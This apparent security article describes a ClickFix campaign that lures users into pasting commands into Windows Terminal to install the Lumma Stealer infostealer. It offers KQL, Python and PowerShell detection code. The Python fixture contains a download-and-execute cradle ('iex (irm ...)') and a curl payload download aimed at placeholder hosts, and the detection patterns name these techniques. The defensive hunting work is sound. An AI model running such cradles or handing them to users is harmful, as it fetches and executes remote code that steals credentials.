Social engineering remains the most effective initial access vector for cybercriminals, and the latest ClickFix campaign discovered by Microsoft proves that attackers are constantly refining their tactics. In February 2026, security researchers observed a sophisticated operation abusing the Windows Terminal application to deliver the notorious Lumma Stealer.
Unlike traditional "fix-it" scams that instruct victims to open the Windows Run dialog (Win+R), this new campaign guides users to launch the modern Windows Terminal. This subtle shift lets threat actors sidestep legacy heuristics that look for cmd.exe or powershell.exe spawned directly from Explorer or the Run dialog, making the attack chain harder to detect.
The Evolution of ClickFix
The ClickFix technique relies on psychological manipulation. Victims are lured to fraudulent web pages—often masquerading as software downloads or technical support sites—that display fake error messages. To "resolve" the issue, the user is instructed to copy and paste a provided command into their terminal.
By targeting the Windows Terminal (wt.exe), attackers exploit a tool that developers and power users trust. The command typically initiates a PowerShell script that establishes a connection to a remote server, downloading the Lumma Stealer payload. Because the command is executed by the user, it bypasses standard file-based malware detection, as the terminal itself is a trusted system utility.
The Payload: Lumma Stealer
Once the command is executed, the system is infected with Lumma Stealer. This information-stealing malware is a commodity sold on dark web forums, designed to harvest sensitive data from compromised machines. Its primary targets include:
- Cryptocurrency wallet keys and extensions
- Browser cookies and saved passwords
- Two-factor authentication (2FA) session tokens
- System information and hardware fingerprints
Technical Analysis of the Attack Chain
The attack begins with a user interaction event. Instead of the classic chain of explorer.exe spawning cmd.exe, the TTP (Tactics, Techniques, and Procedures) involves explorer.exe spawning WindowsTerminal.exe, which in turn spawns a child process such as powershell.exe or curl.exe to fetch the payload.
This chain is statistically rare in administrative environments. Most legitimate use of Windows Terminal involves manual command-line administration, not automated script downloading. This anomaly provides a high-fidelity signal for detection.
Detection and Threat Hunting
Security teams can hunt for this behavior by monitoring process creation events where WindowsTerminal.exe acts as a parent process to network-facing utilities like PowerShell, cURL, or BITSAdmin.
The following KQL query for Microsoft Sentinel/Defender can help identify this activity:
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName == "WindowsTerminal.exe"
| where FileName in~ ("powershell.exe", "cmd.exe", "curl.exe", "powershell_ise.exe", "bitsadmin.exe")
| where ProcessCommandLine has "http" or ProcessCommandLine has "iex" or ProcessCommandLine has "Invoke-Expression"
| project Timestamp, DeviceName, AccountName, InitiatingProcessCommandLine, ProcessCommandLine, FileName, FolderPath
| order by Timestamp desc
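The KQL above only runs inside Sentinel or Defender. The following is an added example, not code from the article or from Microsoft, that reimplements the same rule as a standalone filter so the logic can be tested offline or ported to another SIEM: WindowsTerminal.exe as parent, a shell or download utility as child, and a URL or Invoke-Expression indicator on the command line. Field names mirror the DeviceProcessEvents columns used in the query; the JSON-lines export format and all sample events (hostnames, accounts, the placeholder.invalid URLs) are constructed for illustration.

```python
"""Offline triage of process-creation records for the Windows Terminal
ClickFix pattern: WindowsTerminal.exe as parent of a shell or download
utility whose command line carries a URL or an Invoke-Expression.
Mirrors the KQL rule; field names follow DeviceProcessEvents."""
import json
import re
from typing import Iterator

# Child processes worth flagging when spawned by Windows Terminal
# (same list as the KQL `in~` clause; extend as your telemetry warrants).
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "cmd.exe", "curl.exe", "powershell_ise.exe", "bitsadmin.exe",
}

# Command-line indicators. "http" is a substring match (covers http/https);
# the other two are whole-token matches, which is what KQL `has` does.
INDICATORS = {
    "url": re.compile(r"http", re.IGNORECASE),
    "iex": re.compile(r"\biex\b", re.IGNORECASE),
    "invoke-expression": re.compile(r"\binvoke-expression\b", re.IGNORECASE),
}

# Constructed sample export: one JSON object per line, as an EDR/SIEM export
# might look. Hosts, accounts and URLs are placeholders, not real indicators.
SAMPLE_EVENTS = r"""
{"Timestamp":"2026-02-12T09:14:03Z","DeviceName":"WS-DEV-07","AccountName":"jdoe","InitiatingProcessFileName":"WindowsTerminal.exe","FileName":"powershell.exe","ProcessCommandLine":"powershell.exe -c \"iex (irm http://placeholder.invalid/verify)\""}
{"Timestamp":"2026-02-12T09:20:41Z","DeviceName":"WS-DEV-07","AccountName":"jdoe","InitiatingProcessFileName":"WindowsTerminal.exe","FileName":"powershell.exe","ProcessCommandLine":"powershell.exe -NoLogo -c Get-ChildItem C:\\Projects"}
{"Timestamp":"2026-02-12T10:02:17Z","DeviceName":"WS-OPS-02","AccountName":"svc_build","InitiatingProcessFileName":"explorer.exe","FileName":"curl.exe","ProcessCommandLine":"curl.exe -o artifact.zip https://placeholder.invalid/artifact.zip"}
{"Timestamp":"2026-02-12T11:45:59Z","DeviceName":"WS-DEV-03","AccountName":"asmith","InitiatingProcessFileName":"WindowsTerminal.exe","FileName":"curl.exe","ProcessCommandLine":"curl.exe -o update.ps1 https://placeholder.invalid/update"}
"""


def parse_jsonl(text: str) -> Iterator[dict]:
    """Parse one JSON object per line, skipping blank lines."""
    for line in text.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)


def classify(event: dict) -> list[str]:
    """Return the indicator names that fire for one event, or [] if it is out of scope or benign."""
    parent = event.get("InitiatingProcessFileName", "").lower()
    child = event.get("FileName", "").lower()
    if parent != "windowsterminal.exe" or child not in SUSPICIOUS_CHILDREN:
        return []
    cmd = event.get("ProcessCommandLine", "")
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def triage(events) -> list[dict]:
    """Reduce events to findings, newest first, projecting the fields an analyst needs."""
    findings = []
    for ev in events:
        hits = classify(ev)
        if hits:
            findings.append({
                "Timestamp": ev.get("Timestamp"),
                "DeviceName": ev.get("DeviceName"),
                "AccountName": ev.get("AccountName"),
                "FileName": ev.get("FileName"),
                "ProcessCommandLine": ev.get("ProcessCommandLine"),
                "Indicators": hits,
            })
    return sorted(findings, key=lambda f: f["Timestamp"] or "", reverse=True)


if __name__ == "__main__":
    for finding in triage(parse_jsonl(SAMPLE_EVENTS)):
        print(json.dumps(finding))
```

Run against the sample, two of the four records are flagged: the PowerShell launch carrying both a URL and `iex`, and the curl download. The ordinary `Get-ChildItem` invocation from the same terminal is not flagged, and the curl launched from explorer.exe falls outside this rule's scope by design, which is a reminder that the query above is a high-fidelity signal for one chain rather than general download-cradle coverage.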
For administrators conducting local forensics, the following PowerShell script queries the Security event log for process creation events (Event ID 4688) whose parent process is Windows Terminal. Process creation auditing must be enabled on the host, and the command line field is only populated when the "Include command line in process creation events" policy is turned on:
$TargetDate = (Get-Date).AddDays(-1)
$Events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4688
    StartTime = $TargetDate
} -ErrorAction SilentlyContinue

# 4688 event data layout: [5] NewProcessName (the child), [8] CommandLine
# (empty unless command line auditing is enabled), [13] ParentProcessName.
$SuspiciousActivity = $Events | Where-Object {
    $_.Properties[13].Value -match 'WindowsTerminal\.exe$'   # Parent Process Name
}

if ($SuspiciousActivity) {
    Write-Host "ALERT: Suspicious Windows Terminal spawns detected." -ForegroundColor Red
    $SuspiciousActivity | ForEach-Object {
        Write-Host "Time:    $($_.TimeCreated)"
        Write-Host "Parent:  $($_.Properties[13].Value)"
        Write-Host "Child:   $($_.Properties[5].Value)"
        Write-Host "Command: $($_.Properties[8].Value)"
        Write-Host "--------------------------------"
    }
} else {
    Write-Host "No suspicious activity found in the last 24 hours." -ForegroundColor Green
}
Mitigation Strategies
To defend against this evolving threat, organizations should implement a defense-in-depth approach:
- Application Control: Utilize AppLocker or Windows Defender Application Control (WDAC) to restrict which applications can be launched by Windows Terminal. For most end-users, the terminal should not be launching PowerShell scripts or downloading files via cURL.
- Attack Surface Reduction (ASR) Rules: Enable the ASR rules "Block all Office applications from creating child processes" and "Block Adobe Reader from creating child processes" to prevent similar vectors, and evaluate rules restricting PowerShell execution.
- User Awareness: Update security awareness training to include the "Terminal Fix" scam. Users should be skeptical of any website instructing them to open Windows Terminal and paste code.
- Restrict Windows Terminal Access: If your organization does not utilize Windows Terminal for daily operations, consider removing it or restricting its execution via Group Policy to developer and engineering groups only.